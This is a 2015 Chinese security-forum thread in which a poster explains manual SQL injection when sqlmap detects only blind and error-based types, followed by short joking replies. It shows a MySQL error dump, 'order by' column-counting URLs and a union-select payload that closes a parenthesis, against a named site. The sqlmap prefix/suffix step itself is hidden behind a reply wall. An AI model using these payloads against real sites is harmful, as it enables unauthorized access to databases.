请选择 进入手机版 | 继续访问电脑版

SSS安全论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

产品
产品
团队
团队
版规
版规
查看: 6024|回复: 128

sqlmap注入之另类高级注入法

  [复制链接]
  • TA的每日心情
    擦汗
    9 小时前
  • 签到天数: 278 天

    [LV.8]以坛为家I

    发表于 2015-11-4 11:54:05 | 显示全部楼层 |阅读模式
    本帖最后由 sinver 于 2015-11-4 11:56 编辑

    今天在用sqlmap的时候正好遇到这样的情况...所以说,工具不是万能的,手工才是王道!

    现在能够帮助我们进行sql注入检测的工具越来越多,但我认为,通用性最强的还是sqlmap,其他工具在灵活性上远远不及sqlmap。sql注入有许多类型,其中最喜欢的当然是能够union查询的,比blind类型的不知道爽到哪里去了。
    现在有一个url已知存在sql注入漏洞,我们丢到sqlmap里面,跑一下,结果是这样的
    123123123.png

    很明显,是一些比较恶心的注入类型,bind和error-based,难道我们就只能听工具的了么,我们手动来看一看。sq报错如下
    [PHP] 纯文本查看 复制代码
    MySQL Error
    Message: MySQL Query Error
    SQL: select ..... and pass=0 and (c.catid=2\' or c.parentid=2\') and subject like '%%'
    Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' or c.parentid=2\') and subject like '%%'' at line 4
    Errno.: 1064
    Click here to seek help.
    
    报错显示,这里懂sql语句有点复杂并且不是常规懂类型,需要闭合括号还有最好屏蔽掉后面的like语句,构造一下


    http://www.sssie.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2 order by 15 --
    http://www.sssie.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2 order by 16 --

    order by确认了查出来懂总共16条,那么,继续试试

    http://www.sssie.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2) and 1=2 union% select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15 --

    手工确认之后,使用sqlmap来继续进行,我们需要用到sqlmap的两个选项,suffix和prefix,添加以下语句的前缀和后缀。



    游客,如果您要查看本帖隐藏内容请回复


    最终结果

    123123123.png




    123123123.png
    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2017-1-23 22:27
  • 签到天数: 173 天

    [LV.7]常住居民III

    发表于 2015-11-4 12:30:13 | 显示全部楼层
    喜欢这个标题                                          
  • TA的每日心情

    3 天前
  • 签到天数: 180 天

    [LV.7]常住居民III

    发表于 2015-11-4 12:51:31 | 显示全部楼层
    顶楼主啦..希望楼主多发精品好帖啦.....
  • TA的每日心情
    擦汗
    2016-9-8 15:05
  • 签到天数: 68 天

    [LV.6]常住居民II

    发表于 2015-11-4 13:25:08 | 显示全部楼层
    ?    我装作看不懂的样子
  • TA的每日心情
    擦汗
    2016-9-8 15:05
  • 签到天数: 68 天

    [LV.6]常住居民II

    发表于 2015-11-4 13:25:54 | 显示全部楼层
    我装作看不懂的样子
  • TA的每日心情
    擦汗
    9 小时前
  • 签到天数: 278 天

    [LV.8]以坛为家I

     楼主| 发表于 2015-11-4 13:38:30 | 显示全部楼层
    薄雾 发表于 2015-11-4 12:51
    顶楼主啦..希望楼主多发精品好帖啦.....

    连发4篇...哪篇不是精品好贴...
  • TA的每日心情
    奋斗
    2016-7-14 17:48
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2015-11-4 13:38:33 | 显示全部楼层
    这种注入碧哥肯定不会,他是2货
  • TA的每日心情
    擦汗
    9 小时前
  • 签到天数: 278 天

    [LV.8]以坛为家I

     楼主| 发表于 2015-11-4 13:39:13 | 显示全部楼层
    95zz 发表于 2015-11-4 13:38
    这种注入碧哥肯定不会,他是2货

    说好的 TX漏洞挖掘呢!!
  • TA的每日心情
    开心
    2015-11-19 08:13
  • 签到天数: 16 天

    [LV.4]偶尔看看III

    发表于 2015-11-4 14:43:29 来自手机 | 显示全部楼层
    让我来装看懂了的样子
  • TA的每日心情
    奋斗
    昨天 15:58
  • 签到天数: 176 天

    [LV.7]常住居民III

    发表于 2015-11-4 14:48:31 来自手机 | 显示全部楼层
    好叼。很有用的文章
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    关注微信赢邀请码

    QQ|Archiver|手机版|网站地图|网页地图|SSS安全论坛 ( 黔ICP备15010987号  

    GMT+8, 2017-2-28 17:54 , Processed in 0.198049 second(s), 35 queries .

    Powered by SSS团队 X3.2

    © 2014-2015 Comsenz Inc.

    快速回复 返回顶部 返回列表